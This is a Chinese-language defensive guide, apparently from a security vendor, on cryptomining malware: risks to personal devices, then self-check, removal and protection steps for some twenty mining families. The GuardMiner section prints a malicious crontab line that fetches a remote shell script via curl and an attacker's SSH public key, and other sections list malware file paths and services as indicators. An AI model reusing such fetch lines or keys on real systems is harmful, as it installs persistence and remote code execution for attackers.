个人用户面对的恶意挖矿问题 

相比企业机构来说，个人上网用户面对着同样相似的恶意挖矿问题，如个人 电脑，手机，路由器，以及各类智能设备存在被感染和用于恶意挖矿的情况。像 现在手机的硬件配置往往能够提供很高的算力。奇安信威胁情报中心在 2018 年 就配合网络研究院及多个安全部门联合分析和披露了名为 ADB.Miner 的安卓蠕 虫[2]，其就是利用智能电视或智能电视盒子进行恶意挖矿。

当用户安装了内嵌有挖矿程序模块的 APP 应用，或访问了植入有挖矿脚本 的不安全网站或被入侵的网站，往往就会造成设备算力被用于恶意挖矿。而其影 响通常会造成设备和系统运行不稳定，异常发热和耗电，甚至会影响设备的使用 寿命和电池寿命。 

如何避免感染恶意挖矿程序 

以下我们提出几点安全建议让个人用户避免感染恶意挖矿程序：

1.  提高安全意识，从正常的应用市场和渠道下载安装应用程序，不要随意 点击和访问一些具有诱导性质的网页；

2.  及时更新应用版本，系统版本和固件版本；

3.  安装个人终端安全防护软件。

 

典型的恶意挖矿恶意代码家族及自查方法 

8220 挖矿攻击 

概述

 

 

挖矿攻击名称	8220 团伙挖矿攻击
涉及平台	Linux
相关恶意代码家族	未命名
攻击入口	利用多种远程执行漏洞和未授权访问漏洞
相关漏洞及编号	WebLogic XMLDecoder 反序列化漏洞、Drupal 的远程任意代码执行漏洞、JBoss   反序列化命令执行漏洞、Couchdb 的组合漏洞、Redis、Hadoop 未授权访问漏洞
描述简介	8220 团伙挖矿攻击是奇安信威胁情报中心发现的挖矿攻击黑客团伙，其主   要针对高校相关的 Linux 服务器实施挖矿攻击。

 

自查办法

 

1. 执行 netstat -an 命令，存在异常的 8220 端口连接

2. top 命令查看 CPU 占用率最高的进程名为 java，如下图为利用 Hadoop 未授权 访问漏洞攻击

 3. 在/var/tmp/目录下存在如 java、pscf3、w.conf 等名称的文件

4. 执行 crontab -u yarn -l 命令查看是否存在可疑的定时任务 

5. 通过查看/var/log/cron*相关的 crontab 日志，看是否存在利用 wget 访问和下载 异常的远程 shell 脚本

 

 

如何清除和防护 

1. 终止挖矿进程，删除/var/tmp 下的异常文件

2.    删除异常的 crontab 任务

3. 检查是否存在上述漏洞的组件或服务，若存在则更新相关应用和组件到最新 版本，若组件或服务未配置远程认证访问，则开启相应的认证配置

 

WannaMiner/MsraMiner/HSMiner 

概述 

挖矿攻击名称	WannaMiner
涉及平台	Windows
相关恶意代码家族	WannaMiner，MsraMiner，HSMiner
攻击入口	使用永恒之蓝漏洞
相关漏洞及编号	CVE-2017-0144
描述简介	WannaMiner 是一个非常活跃的恶意挖矿家族，曾被多个安全厂商披露和命 名，包括 WannaMiner，MsraMiner、HSMiner。其最早活跃于 2017 年 9 月，以 使用“永恒之蓝”漏洞为攻击入口以及使用 “Mimikatz”凭证窃取工具攻击服务器 植入矿机，并借助 PowerShell 和 WMI 实现无文件。

 

自查方法

 

1.    检查是否存在任务计划名为：“Microsoft\Windows\UPnP\Spoolsv”的任务

2.    检查%windir%目录下是否存在 cls.bat 和 spoolsv.exe 和 windows.exe 文件 3.  并检查是否存在可疑的 java.exe 进程

 

如何清除 

1.  删除检查到的可疑任务计划和自启动项
2.  结 束 可 疑 的 进 程 , 如 运 行 路 径 为 ： %windir%\IME\Microsofts\ 和 运 行 路 径 为%windir%\spoolsv.exe 和%windir%\windows.exe 的进程

3.  删除 c 盘目录下的 012.exe 和 023.exe 文件 

防护方法 

1.  安装 Windows 系统补丁并保持自动更新

2.  如果不需要使用 Windows 局域网共享服务，可以通过设置防火墙规则来关闭

445 等端口 

3.  安装奇安信天擎可有效防护该类挖矿病毒的攻击 

JbossMiner 

概述

 

挖矿攻击名称	JbossMiner
涉及平台	Windows，Linux  服务器或主机
相关恶意代码家族	JbossMiner
攻击入口	利用多种远程执行漏洞和未授权访问漏洞
相关漏洞及编号	jboss 漏洞利用模块，structs2 利用模块，永恒之蓝利用模块，mysql 利用模块，   redis 利用模块，Tomcat/Axis 利用模块
描述简介	JbossMiner 主要是通过上述六大漏洞模块进行入侵和传播，并植入挖矿木马获 利。其挖矿木马同时支持 windows 和 linux 两种平台，根据不同的平台传播不同 的 payload。

 

自查方法 

Linux 平台 

1． 检查是否存在/tmp/hawk 文件
2． 检查是否存在/tmp/lower*.sh 或/tmp/root*.sh 文件 3． 检查 crontab 中是否有可疑的未知定时任务

 

Windows 平台 

1.  检查是否有名为 Update*的可疑计划任务和 Updater*的可疑启动项
2.  检查是否存在%temp%/svthost.exe 和%temp%/svshost.exe 文件
3.  检查是否存在一个 rigd32.txt 的进程 

如何清除 

Linux 平台 

可以执行如下步骤执行清除：

1.  删除 crontab 中可疑的未知定时任务

2.  删除/tmp/目录下的 bashd、lower*.sh、root*.sh 等可疑文件 3.  结束第 2 步发现的各种可疑文件对应的可疑进程。 

Windows 平台 

可以执行如下步骤进行清除：
1.  删除可疑的计划任务和启动项

2.    结束进程中名为 svshost.exe、svthost.exe 的进程

3.    结束可疑的 powershell.exe、regd32.txt 等进程
4.  清空%temp%目录下的所有缓存文件 

防护方法 

1.  如果不需要使用 Windows 局域网共享服务，可以通过设置防火墙规则来关闭445 等端口

2.  修改服务器上的数据库密码，设置为更强壮的密码

3.  安装系统补丁和升级产品所使用的类库

4.  Windows 下可以安装奇安信天擎防护该类挖矿病毒的攻击 

MyKings 

MyKings 是一个大规模多重僵尸网络，并安装门罗币挖矿机，利用服务器资 源挖矿。 

概述

 

挖矿攻击名称	MyKings
涉及平台	Windows 平台
相关恶意代码家族	DDoS、Proxy、RAT、Mirai
攻击入口	通过扫描开放端口，利用漏洞和弱口令进行入侵
相关漏洞及编号	永恒之蓝
描述简介	MyKings  是一个由多个子僵尸网络构成的多重僵尸网络，2017  年 4  月底以来， 该僵尸网络一直积极地扫描互联网上 1433  及其他多个端口，并在渗透进入受害 者主机后传播包括 DDoS、Proxy、RAT、Miner  在内的多种不同用途的恶意代 码。

 

自查方法

1.  检查是否存在以下文件： c:\windows\system\my1.bat c:\windows\tasks\my1.job c:\windows\system\upslist.txt c:\program files\kugou2010\ms.exe c:\windows\system\cab.exe c:\windows\system\cabs.exe
2.  检查是否有名为 xWinWpdSrv 的服务

 

如何清除 

可以执行如下步骤进行清除：

1. 删除自查方法 1 中所列的文件

2. 停止并删除 xWinWpdSrv 服务 

防护办法

从僵尸网络当前的攻击重点来看，防范其通过 1433 端口入侵计算机是非常有必 要的。此外，Bot 程序还有多种攻击方式尚未使用，这些攻击方式可能在未来的 某一天被开启，因此也需要防范可能发生的攻击。对此，我们总结以下几个防御 策略：

1. 对于未遭到入侵的服务器，注意 mySQL，RDP，Telnet 等服务的弱口令问题。 如果这些服务设置了弱口令，需要尽快修改；

2. 对于无需使用的服务不要随意开放，对于必须使用的服务，注意相关服务的 弱口令问题；

   3. 特别注意 445 端口的开放情况，如果不需要使用 Windows 局域网共享服务，

可以通过设置防火墙规则来关闭 445 等端口。并及时打上补丁更新操作系统。
4. 关注服务器运行状况，注意 CPU 占用率和进程列表和网络流量情况可以及时 发现系统存在的异常。此外，注意系统账户情况，禁用不必要的账户。
5. Windows 下可以安装奇安信天擎防护该类挖矿病毒的攻击 

ADB.Miner 挖矿攻击自查方法 

概述

 

挖矿攻击名称	ADB.Miner
涉及平台	搭载安卓系统的移动终端，智能设备
相关恶意代码家族	ADB.Miner
攻击入口	利用安卓开启的监听 5555 端口的 ADB 调试接口传播
相关漏洞及编号	无
描述简介	ADB.Miner 是由奇安信发现的利用安卓设备的 ADB 调试接口传播的恶意挖矿程   序，其支持利用 xmrig 和 coinhive 两种形式进行恶意挖矿。

 

自查方法 

1. 执行 top 命令，按"C"查看 CPU 占用率进程，存在类似 com.ufo.miner 的进程

 

   

 

2. 执行 ps | grep debuggerd 命令，存在/system/bin/debuggerd_real 进程

    

3. 执行 ls /data/local/tmp 命令，查看目录下是否存在如下文件名称：droidbot, nohup, bot.dat, xmrig*, invoke.sh, debuggerd 等。 

如何清除 

可以执行如下步骤进行清除：

1. pm uninstall com.ufo.miner 移除相关挖矿程序 APK

2. 执行 ps | grep /data/local/tmp 列举相关挖矿进程，执行 kill -9 进行终止
3.    执行 rm 命令删除/data/local/tmp 下相关文件
4.  mv /system/bin/debuggerd_real /system/bin/debuggerd 恢复 debuggerd 文件 

防护办法

可以采用如下方式进行防护：

1. 进入设置界面，关闭 adb 调试或 adb wifi 调试开关
2.    执行 setprop service.adb.tcp.port 设置调试端口为其他值，ps | grep adbd 获得

adbd 进程并执行 kill -9 进行终止

3. 在 root 权限下可以配置 iptables 禁止外部访问 5555 端口：

iptables -A INPUT -p tcp -m tcp --dport 5555 -j REJECT

 

KoiMiner 

概述  

挖矿攻击名称	KoiMiner
涉及平台	Windows、Linux
相关恶意代码家族	未命名

 

 

攻击入口	Apache Struts2 漏洞攻击、针对企业 SQL Server    服务器的 1433 端口爆破攻击进   行蠕虫式传播
相关漏洞及编号	Apache Struts2 漏洞 S2-045（CVE-2017-5638）、MS16-032 漏洞
描述简介	KoiMiner 是腾讯御见威胁情报中心发现的挖矿攻击木马，由于挖矿木马 netxmr   解密代码后以模块名“koi”加载而将其命名为 KoiMiner。

 

自查办法 

1.  检查 SQL Sever 服务默认端口，检查 1433 端口是否有异常连接
2.  检查是否存在下述文件： C:\WINDOWS\system32\system32.exe C:\ProgramData\system32.exe C:\Users\Public\system32.exe java/sysin
3.      检查是否存在异常服务 WinTcpAutoProxy

 如何清除和防护 

1. 终止挖矿进程

2. 加固 SQL Server 服务器，修补服务器安全漏洞。使用安全的密码策略 ，使用 高强度密码，切勿使用弱口令，特别是 sa 账号密码，防止黑客暴力破解。

3.  修改 SQL Sever 服务默认端口，在原始配置基础上更改默认 1433 端口设置， 并且设置访问规则，拒绝 1433 端口探测。

4. 删除自查方法 2 中所述文件 

NSABuffMiner 

概述 

涉及平台	Windows
相关恶意代码家族	未命名
攻击入口	使用 EternalBlue、DoublePulsar、EternalRomance 等漏洞进行攻击
相关漏洞及编号		MS17-010
描述简介	NSABuffMiner 是腾讯安全御见威胁情报中心在 2018 年 9 月发现的一个挖矿 木马家族，主要利用永恒之蓝漏洞 ms17-010 攻击传播,且 Payload 下载植入的安 装木马常常伪装成某些主流软件程序,常用挖矿进程名为 rundllhost.exe,  因其主 要 C2 域名中包含“buff”特征字符而命名。

 

自查方法

1.  检查是否存在服务名为：“MetPipAtcivator”、“SetPipAtcivator”
2.  检查是否存在可疑账户名“mm123$”
3.  并检查是否存在可疑的 rundllhost.exe 进程 

如何清除

1.  删除检查到的可疑的服务名及账户名

2.  结束可疑的进程如运行路径为：%SystemRoot%fonts\rundllhost.exe 的进程

 

防护方法 

1.  安装 Windows 系统补丁并保持自动更新

2.  如果不需要使用 Windows 局域网共享服务，可以通过设置防火墙规则来关闭445 等端口

3.  安装奇安信天擎防护该类挖矿病毒的攻击 

NSAGluptebaMiner

概述

涉及平台	Windows
相关恶意代码家族	Glupteba 木马
攻击入口	使用 EternalBlue、DoublePulsar 等漏洞进行攻击
相关漏洞及编号	MS17-010
描述简介	2018 年 6 月腾讯安全威胁情报中心发现 cloudnet.exe 开始作为挖矿僵尸网络 NSAGluptebaMiner 的组件传播，cloudnet.exe 原来是 Glupteba 恶意木马。其利用 永恒之蓝漏洞进行传播,通过安装计划任务进行持久化,安装驱动对木马进行保 护，利用组件 cloudnet.exe 构建僵尸网络，并通过比特币交易数据更新 C2 地址。

 

自查方法

1.    检查是否有名为 ScheduledUpdate 的可疑计划任务

2.    检查 C:\Windows\System32\drivers 目录下是否存在隐藏文件 Winmon.sys、 WinmonFS.sys、WinmonProcessMonitor.sys 文件

3.  检查是否存在一个 wup.exe 的进程

 

如何清除 

1. 删除可疑的计划任务和启动项

2.    结束进程中名为 Scheduled.exe、wup.exe 的进程
3.    删除 C:\Windows\System32\drivers 目录下的隐藏驱动文件 Winmon.sys、 WinmonFS.sys、WinmonProcessMonitor.sys

 

防护方法 

1.  如果不需要使用 Windows 局域网共享服务，可以通过设置防火墙规则来关闭

445 等端口

2.  安装 Windows 系统补丁并保持自动更新

3.  安装奇安信天擎防护该类挖矿病毒的攻击 

BuleHero

概述 

挖矿攻击名称	BuleHero
涉及平台	Windows 平台
相关恶意代码家族	未命名
攻击入口	通过扫描开放端口，利用漏洞和弱口令进行入侵
相关漏洞及编号	永恒之蓝、LNK 漏洞 CVE-2017-8464、Tomcat 任意文件上传漏洞 CVE-2017-12615、Apache Struts2 远程代码执行漏洞 CVE-2017-5638、Weblogic 反序列化任意代码执行漏洞 CVE-2018-2628，CVE-2019-2725、Drupal 远程代码 执行漏洞 CVE-2018-7600、Apache Solr 远程代码执行漏洞 CVE-2019-0193、 THinkphpV5 漏洞 CNDV-2018-24942、PHPStudy 后门利用等
描述简介	BlueHero 是一个善于学习和使用各类 Web 服务器组件漏洞进行攻击的家族，于 2018 年 8 月首次被披露。自披露以来，其版本不断的在更新迭代，其在 4.0 版本 新加入的攻击方法就达到十个之多。

 

自查方法
1.  检查是否存在 C:\Windows\tqibchipg\目录，以及下述文件： C:\Windows\SysWOW64\rmnlik.exe C:\Windows\Temp\geazqmbhl\hvkeey.exe
2.  检查是否有名为 mekbctynn 的服务 

如何清除

 可以执行如下步骤进行清除：

1. 删除自查方法 1 中所列目录下的所有文件以及后述文件
2.    停止并删除 mekbctynn 服务 

防护办法 

1. 安装 Windows 系统补丁并保持自动更新，对于无需使用的服务不要随意开放， 对于必须使用的服务，注意相关服务的弱口令问题；

2. 关注服务器运行状况，注意 CPU 占用率和进程列表和网络流量情况可以及时 发现系统存在的异常。此外，注意系统账户情况，禁用不必要的账户。

3. Windows 下可以安装奇安信天擎防护该类挖矿病毒的攻击 

GuardMiner 

概述 

挖矿攻击名称	GuardMiner
涉及平台	Windows, Linux
相关恶意代码家族	GuardMiner
攻击入口	利用多种远程执行漏洞和未授权访问漏洞
相关漏洞及编号	CCTV 设备 RCE 漏洞；Redis 未授权访问漏洞；Drupal 框架 CVE-2018-7600 漏洞； Hadoop 未授权访问漏洞；Spring RCE 漏洞 CVE-2018-1273；Thinkphp V5 高危漏   洞；WebLogic RCE 漏洞 CVE-2017-10271；SQL Server 弱口令爆破；Elasticsearch RCE 漏洞 CVE-2015-1427、CVE-2014-3120
描述简介	GuardMiner 最早出现于 2019 年，至今已活跃超过 2 年，该挖矿木马通过 Go 语言编写的二进制程序针对 Windows 平台和 Linux 平台进行攻击传播，通过 crontab 定时任务以及安装 SSH 公钥后门进行持久化控制，并且还会利用比特币 的交易记录来动态更新 C2 地址

 

自查办法 

1. 查看恶意文件和相关进程 

/etc/phpguard

 

/etc/phpupdate

 

/etc/networkmanager

 

2. 查看定时任务(Crontab)

 

*/30 * * * * sh /etc/newdat.sh

 

*/2 * * * * curl -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh   

 

 3.    查看恶意 SSH 公钥(/root/.ssh/authorized_keys) 

   

AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUW 

DNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO0

6jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+

Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBs

RZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvay

MH7f+Kl2yXiHN5oD9BVTkdIWX root@u17   

如何清除和防护 

1. 检查 tmp、etc 目录下是否具有以下文件，清除对应的进程并删除文件

 

/tmp/phpupdate

 

/tmp/networkmanager

 

/tmp/phpguard

 

/tmp/newdat.sh

 

/tmp/config.json

 

/etc/phpupdate

 

/etc/networkmanager

 

/etc/config.json

 

/etc/newdat.sh   

 

2. 删除恶意定时任务

3. 删除 ssh 的 authorized_keys 中的恶意公钥

4. 恢复防火墙的默认配置

5. 检查是否存在上述漏洞的组件或服务，若存在则更新相关应用和组件到最新 版本，若组件或服务未配置远程认证访问，则开启相应的认证配置 

z0Miner 

概述 

 

挖矿攻击名称	z0Miner
涉及平台	Windows 和 Linux
相关恶意代码家族	z0Miner
攻击入口	利用多种远程执行漏洞和未授权访问漏洞
相关漏洞及编号	Weblogic   未授权命令执行漏洞（CVE-2020-14882/14883）；ElasticSearch RCE  漏 洞 CVE-2015-1427；Jenkins script console RCE  漏洞；Nexus3 命令执行漏洞 （CVE-2019-7238）；Confluence  远程代码执行漏洞（CVE-2019-3396,   CVE-2021-26084）；Struts2 命令执行漏洞 （s2-016，s2-046）
描述简介	z0Miner 从 2020 年开始活跃，最初活跃时利用 Weblogic 未授权命令执行漏 洞进行传播。该挖矿木马背后团伙通过批量扫描云服务器发现具有 Weblogic 漏 洞的机器，发送精心构造的数据包进行攻击。之后执行远程命令下载 shell 脚本 z0.txt 运行，再利用该 shell 脚本植入门罗币挖矿木马、挖矿任务本地持久化，以 及通过爆破 SSH 横向移动。根据该团伙控制的算力推算，当时有大约 5000 台服 务器受害。2021 年 9 月，国外安全厂商趋势科技披露 z0Miner 借助 Confluence 漏洞在 Windows 上传播。

 

自查办法

 

1. 查看恶意文件和相关进程

 

/tmp/.solr/solrd

 

/tmp/.solr/config.json

 

/tmp/.solr/solr.sh  

 

2. 查看包含来自 pastbin 的可疑恶意载荷的定时任务(Crontab) 

如何清除和防护 

1. 删除恶意文件，并清除相应进程 

2. 删除恶意定时任务3. 检查是否存在上述漏洞的组件或服务，若存在则更新相关应用和组件到最新 版本，若组件或服务未配置远程认证访问，则开启相应的认证配置

 

SystemdMiner

 概述 

 

挖矿攻击名称	SystemdMiner
涉及平台	Linux
相关恶意代码家族	SystemdMiner
攻击入口	利用多种远程执行漏洞和未授权访问漏洞，SSH 爆破，SSH 免密登录利用
相关漏洞及编号	PostgreSQL 的未授权访问漏洞和提权代码执行漏洞（CVE-2019-9193）；Hadoop   Yarn 未授权访问漏洞
描述简介	SystemdMiner 在 2019 年被首次发现，起初因其组件以 systemd-<XXX>命名 而得名，但后来它们渐渐开始弃用 systemd 的命名形式，改为以随机字符串命名。   SystemdMiner 在最初出现时通过入侵 DDG 挖矿病毒僵尸网络进行快速扩张。特 点是本身的 C&C 设置在暗网中，通过暗网代理服务进行通信。

 

自查办法 

1. 查看定时任务

存在运行 systemd-login 的定时任务，后期版本创建的定时任务为随机名，定时 任务脚本中除了以拼接的形式直接组成访问的恶意域名外，还会使用了 socket5 的方式用 relay.tor2socks.in 代理访问 C&C 域名

2.    定时访问带有 tor2web、onion 字符串的域名或者 relay.tor2socks.in 3. 在/tmp 目录下出现 systemd*的文件（后期版本为随机名） 

如何清除和防护 

1. 删除恶意定时任务

2. 清除随机名的挖矿进程，清除残留的 systemd-login 和*.sh 病毒脚本
3. 检查是否存在上述漏洞的组件或服务，若存在则更新相关应用和组件到最新 版本，若组件或服务未配置远程认证访问，则开启相应的认证配置

 

WatchdogsMiner 

概述

 

挖矿攻击名称	WatchdogsMiner
涉及平台	Windows 和 Linux
相关恶意代码家族	WatchdogsMiner
攻击入口	利用未授权访问漏洞，SSH 爆破
相关漏洞及编号	Redis 未授权访问漏洞
描述简介	WatchdogsMiner 于 2019 年被发现，由于其会在/tmp/目录下释放一个叫 watchdogs 的母体文件而得名。WatchdogsMiner 的初始版本会将恶意代码托管在 pastebin.com 上以绕过检测，不过后续版本已弃用，改为自己的 C&C 服务器 *.systemten.org。该病毒的特点是样本由 go 语言编译，并使用了伪装的   hippies/LSD 包（github_com_hippies_LSD_*）

 

自查办法 

1. 查看定时任务

存在执行 pastebin.com 网站上恶意代码的定时任务

2. 查看文件

/tmp/目录下存在一个名为 watchdogs 的文件
3.    访问*.systemten.org 域名

 如何清除和防护 

1. 删除恶意动态链接库 /usr/local/lib/libioset.so
2. 删除恶意定时任务

3. 清除挖矿进程
4. 检查是否存在上述漏洞的组件或服务，若存在则更新相关应用和组件到最新 版本，若组件或服务未配置远程认证访问，则开启相应的认证配置 

PhotoMiner 

概述 

挖矿攻击名称	PhotoMiner 挖矿
涉及平台	Windows
相关恶意代码家族	未命名
攻击入口	爆破 FTP 和 SMB 的弱口令
相关漏洞及编号	无
描述简介	PhotoMiner 是一个活跃已久的挖矿病毒家族，主要通过感染后爆破 FTP 和 SMB   的弱口令进行传播。

 

自查办法 

1.  检查有无 Photo.scr 进程运行。

2.  检查每个磁盘根目录下有无 Photo.scr
3.  检查注册表  HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 下 有无 Photo.scr 相关的自启动

 

如何清除和防护 

1.  终止挖矿进程，删除 Photo.scr
2.  删除上述自启动项 

DDG Mining Botnet 

概述

 

挖矿攻击名称	PhotoMiner 挖矿
涉及平台	Linux
相关恶意代码家族	未命名
攻击入口	OrientDB 漏洞
相关漏洞及编号	CVE-2017-11467 OrientDB  远程代码执行漏洞
描述简介	DDG 主要扫描互联网上的 OrientDB  数据库服务器并进行攻击。进一步的分析   发现，这是一个长期运营的僵尸网络，其主要目标是挖取门罗币

 

自查办法 

1.  Crontab 中有异常项目

2.  有名为 wnTKYg 的进程运行 

如何清除和防护 

1.  移除 Crontab 中的可疑项目
2.  结束有关进程

3.  即时更新相关安全补丁 

H2Miner 

概述

 

挖矿攻击名称	H2Miner 挖矿团伙
涉及平台	Linux
相关恶意代码家族	未命名
攻击入口	利用多种远程执行漏洞

 

 

相关漏洞及编号	XXL-JOB 未授权命令执行漏洞，PHPUnit 远程代码执行漏洞（CVE-2017-9841)， Supervisord 远程命令执行漏洞（CVE-2017-11610），ThinkPHP 5.X 远程命令执 行漏洞，SaltStack 远程命令执行漏洞（CVE-2020-11651   CVE-2020-11652）
描述简介	H2Miner 是一个 linux 下的挖矿僵尸网络，并且利用多种漏洞进行传播

 

自查办法 

由于该挖矿家族变种较多，感染路径复杂，暂无比较通用的检查方案
1.  检查有无高 CPU 占用异常程序

2.  检查有无异常 corntab 项目

3.  检查/etc/ld.so.preload 内有无恶意预加载项

 

如何清除和防护 

1.  清除有关的恶意进程和启动项

2.  及时为相关服务和依赖升级或安装安全补丁

 

PowerGhost 

概述  

挖矿攻击名称	PowerGhost
涉及平台	Windows、Linux
相关恶意代码家族	未命名
攻击入口	永恒之蓝、MSSQL 爆破、SSH 爆破、wmi 以及 smb 爆破远程命令执行
相关漏洞及编号	永恒之蓝漏洞（MS17-010）、脏牛漏洞(CVE-2016–5195)  、MS16-032、 MS15-051、   CVE-2018-8120
描述简介	PowerGhost   恶意软件是一个 powershell 脚本，其中的主要的核心组件有：挖矿程序、minikatz   工具，反射 PE 注入模块、主要利用永恒之蓝的漏洞的 shellcode 以及 MS16-032，MS15-051 和 CVE-2018-8120 漏洞提权 payload。主要针对企业用户，在大型企业内网进行传播，并且 挖矿采用无文件的方式进行，因此杀软很难查杀到挖矿程序

 

自查办法 

1.      检查是否有文件名为 java-log-9527.log，cohernece.txt 的文件

2.      检查是否存在 antitrojan.ps,antivirus.ps1 等可疑文件。 

 

如何清除 

1.  终止可疑文件的相关进程

2.  彻底删除进程对应的文件 

 

防护方法

 

1、打上永恒之蓝补丁；

2、关闭 135，139，445 等端口，如果没有业务必要，建议封堵；

3、不要使用域管账号随意登录域内机器，域内机器密码应互不相同；

4、使用高强度密码，禁止弱口令；

5、修补 CVE-2016-5195 漏洞 

NSAFtpMiner 

概述 

挖矿攻击名称	NSAFtpMiner
涉及平台	Windows
相关恶意代码家族	未命名
攻击入口	利用密码字典爆破 1433 端口登录，以及 Eternalblue 等漏洞攻击工具来进行内网   攻击。
相关漏洞及编号	永恒之蓝(MS17-010)
描述简介	NSAFtpMiner 是腾讯安全御见威胁情报中心在 2018 年 9 月发现的一个挖矿木

 

 

   

自查方法
1.  检查是否存在服务名为：“Server Remote”。
2.  检查是否存在以下文件：
C:\Program Files\Windowsd\Fileftp.exe C:\Program Files\Windowsd\Pkil.dll C:\Windows\runsum.exe C:\Windows\Fonts\sysIntl\help.dll C:\Windows\Help\win1ogins.exe C:\Windows\PLA\system\win1ogins.exe C:\Windows\Fonts\system(x64)\win1ogins.exe C:\Windows\Fonts\system(x86)\win1ogins.exe C:\Windwos\dell\win1ogins.exe 

如何清除 

1.  删除检查到的可疑的服务

2.  终止可疑的进程以及文件如 C:\Program Files\Windowsd\Fileftp.exe 

防护方法 

1.  安装 Windows 系统补丁并保持自动更新
2.  服务器使用安全的密码策略，使用高强度密码，切勿使用弱口令，防止黑客暴力 破解
3.  安装奇安信天擎防护该类挖矿病毒的攻击 

ZombieboyMiner 

概述

 

挖矿攻击名称	ZombieboyMiner
涉及平台	Windows
相关恶意代码家族	未命名
攻击入口	使用 EternalBlue、DoublePulsar 等漏洞进行攻击
相关漏洞及编号	永恒之蓝（MS17-010）
描述简介	腾讯御见威胁情报中心在对黑客于 2018.08.14 注册并使用的 C2 域名 fq520000.com 及其样本进行分析，然后通过对比 Zombieboy 木马在几轮攻击中 的攻击手法、恶意代码特征、C2 域名及 IP、端口特征的一致性，推测得出攻击 来源属于同一团伙，并将其命名为 ZombieboyMiner。

 

自查方法

 1.    检查是否有名 dazsksgmeakjwxo 的可疑服务

 2.    检查 C:\Windows\System32\目录下是否存在隐藏文件 seser.exe
 3.    检查是否存在 sys.exe，CPUInfo.exe，84.exe 等可疑进程 

如何清除

1.    中止可疑的服务和进程如 dazsksgmeakjwxo 服务

2.    删除可疑的文件以及自启动项如 C:\Windows\System32\seser.exe,sys.exe

 

防护方法 

1.  服务器关闭不必要的端口，例如 139、445 端口
2.  安装永恒之蓝漏洞补丁。
3.  安装奇安信天擎防护该类挖矿病毒的攻击

 

驱动人生挖矿团伙 

概述

 

挖矿攻击名称	驱动人生挖矿团伙
涉及平台	Windows、Linux
相关恶意代码家族	未命名
攻击入口	利用永恒之蓝漏洞、SMBGhost 漏洞等多种高危漏洞,对 MSSQL,SSH 暴力破解
相关漏洞及编号	永恒之蓝（MS17-010），SMBGhost(CVE-2020-0796)
描述简介	“驱动人生”病毒自 2018 年出现，至今出现多个变种，不断进行技术优化以躲避 安全软件的查杀监测, 该病毒利用永恒之蓝漏洞、SMBGhost 漏洞等多种高危漏 洞对 Windows、Linux 下的主机进行入侵感染，在入侵成功之后不仅会下载挖矿 文件进行挖矿，还会释放传播模块继续入侵感染其他终端，并且病毒所使用的 Powershell 脚本经过多层混淆用以逃避安全软件的查杀.

 

自查方法 

1.  C:\Windows\System32\Windowspowershell\V1.0\powershell.exe 被重命名为 随机字符的 exe
2.  检查是否有/.Xl1/xr 的文件
3.  /etc/crontab 文件中是否有 a.asp 的计划任务

 

如何清除 

可以执行如下步骤进行清除：

1.  终止进程并删除/.Xl1/xr 文件
2.  删除计划任务以及对应文件 

防护办法 

1. 安装 Windows 系统漏洞补丁并保持自动更新，针对使用 445 端口的业务，进 行权限限制

2. 采用高强度的密码，避免使用弱口令密码，并定期更换密码

3. 如不使用，禁用 PowerShell

4. Windows 下可以安装奇安信天擎防护该类挖矿病毒的攻击